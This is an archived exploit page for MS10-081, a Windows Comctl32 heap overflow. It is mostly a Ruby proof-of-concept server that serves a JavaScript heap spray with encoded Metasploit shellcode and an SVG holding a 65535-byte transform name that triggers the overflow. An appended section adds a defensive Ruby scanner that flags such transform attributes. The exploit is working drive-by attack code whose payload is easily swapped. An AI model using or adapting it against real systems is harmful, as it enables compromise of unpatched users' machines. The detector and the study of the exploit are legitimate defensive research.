MS10-081: Windows Common Control Library (Comctl32) Heap Overflow

11 Jan 2011. Reported by RootType. Source: seebug (www.seebug.org)


Code

#!/usr/bin/env ruby

# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
 
require 'socket'
 
def http_send(sock, data, opts={})
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
    opts = defaults.merge(opts)
     
    code = opts[:code]
    message = opts[:message]
    type = opts[:type]
     
    date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
    headers = "HTTP/1.1 #{code} #{message}\r\n" +
              "Date: #{date_str}\r\n" +
              "Content-Length: #{data.length}\r\n" +
              "Content-Type: #{type}\r\n\r\n"
    puts "[+] Sending #{opts[:desc]}"
    sock.write(headers + data) rescue return false
    return true
end
  
def sock_read(sock, out_str, timeout=5)
    begin
        if Kernel.select([sock],[],[],timeout)
            out_str.replace(sock.recv(1024))
            puts "[+] Received:"
            puts "    " + out_str.split("\n")[0]
            return true
        else
            sock.close
            return false
        end
    rescue Exception => ex
        return false
    end
end
 
port = ARGV[0] || 55555
 
transform_name = "\x21" * 65535
 
svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 
<svg xmlns="http://www.w3.org/2000/svg"
    xmlns:xlink="http://www.w3.org/1999/xlink">
 
    <rect x="50" y="50" height="110" width="110"
          style="fill: #ffffff"
          transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
            >
    </rect>
    <text x="100" y="100">CLICK ME</text>
</svg>
SVG
 
html = <<-HTML
<html>
    <body>
        <script>
            <!--
                function str_dup(str, length) {
                    var result = str;
                    while(result.length < length) {
                        result += result;
                    }
                    return result.substr(result.length - length);
                }
 
                var shellcode = unescape("%u9000%u9090%u9090") +
                                // msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
                                unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
                                         "%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
                                         "%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
                                         "%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
                                         "%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
                                         "%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
                                         "%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
                                         "%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
                                         "%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
                                         "%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
                                         "%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
                                         "%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
                                         "%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
                                         "%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
                                         "%u7c96%u0e88");
                var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
                var arr = [];
                for(var i = 0; i < 2000; i++) {
                    arr[i] = document.createElement("a");
                    arr[i].innerHTML = [base + shellcode].join("");
                }
            -->
        </script>
        <iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
    </body>
</html>
HTML
 
puts "[+] Listening on port #{port}"
puts
 
TCPServer.open(port) do |srv|
    while true
        cli = srv.accept
        req = ""
        next unless sock_read(cli, req, 5)
        while req.length > 0
            if req =~ /GET.*svg/i
                break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
            elsif req =~ /QUIT/
                exit()
            else
                break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
            end
            req = ""
            next unless sock_read(cli, req, 5)
        end
        cli.close rescue next
    end
end
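The PoC above triggers the overflow through an SVG `transform` attribute whose function name is 65535 bytes long. The following is an added defender-side check, not part of the original PoC or of seebug's code: it walks every `transform` attribute in an SVG document and flags function names that are oversized, not one of the SVG 1.1 transform functions, or missing their argument list. The allowed-name list, the `MAX_FUNC_LEN` limit and the two sample documents are constructed assumptions.

```ruby
# Added example (not from the original PoC): flag SVG transform attributes
# whose function name is oversized or unknown, the trigger shape used above.
# Assumptions: input is the SVG text as a String; SVG_TRANSFORMS lists the
# SVG 1.1 transform functions; MAX_FUNC_LEN is a constructed sanity limit.
require 'strscan'

SVG_TRANSFORMS = %w[matrix translate scale rotate skewX skewY].freeze
MAX_FUNC_LEN = 16

# Returns an Array of findings, one Hash per suspicious transform entry:
# { name: <first 12 chars>, length: <name length>, reason: <String> }.
def scan_svg_transforms(svg_text)
  findings = []
  # Pull out every transform="..." / transform='...' attribute value.
  svg_text.scan(/\btransform\s*=\s*(["'])(.*?)\1/m) do |_quote, value|
    scanner = StringScanner.new(value)
    until scanner.eos?
      scanner.skip(/[\s,]+/)            # separators between list entries
      break if scanner.eos?
      name = scanner.scan(/[^\s(,]+/)   # entry is: name '(' args ')'
      break if name.nil?
      args = scanner.scan(/\s*\((.*?)\)/m) # nil when the '(' ... ')' is absent
      reason = if name.length > MAX_FUNC_LEN
                 "oversized function name"
               elsif !SVG_TRANSFORMS.include?(name)
                 "unknown transform function"
               elsif args.nil?
                 "unterminated argument list"
               end
      findings << { name: name[0, 12], length: name.length, reason: reason } if reason
    end
  end
  findings
end

# Constructed samples: a benign transform list and one shaped like the PoC trigger.
BENIGN_SVG = '<rect transform="translate(30) rotate(45 50 50)"/>'
TRIGGER_SVG = '<rect transform="' + ('!' * 65535) + '(10) translate(30)"/>'

if __FILE__ == $0
  scan_svg_transforms(TRIGGER_SVG).each do |f|
    puts "[!] #{f[:reason]}: #{f[:name]}... (#{f[:length]} bytes)"
  end
end
```

The same scan can run over web proxy or mail gateway captures of `image/svg+xml` content to spot this trigger pattern before it reaches an unpatched client.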
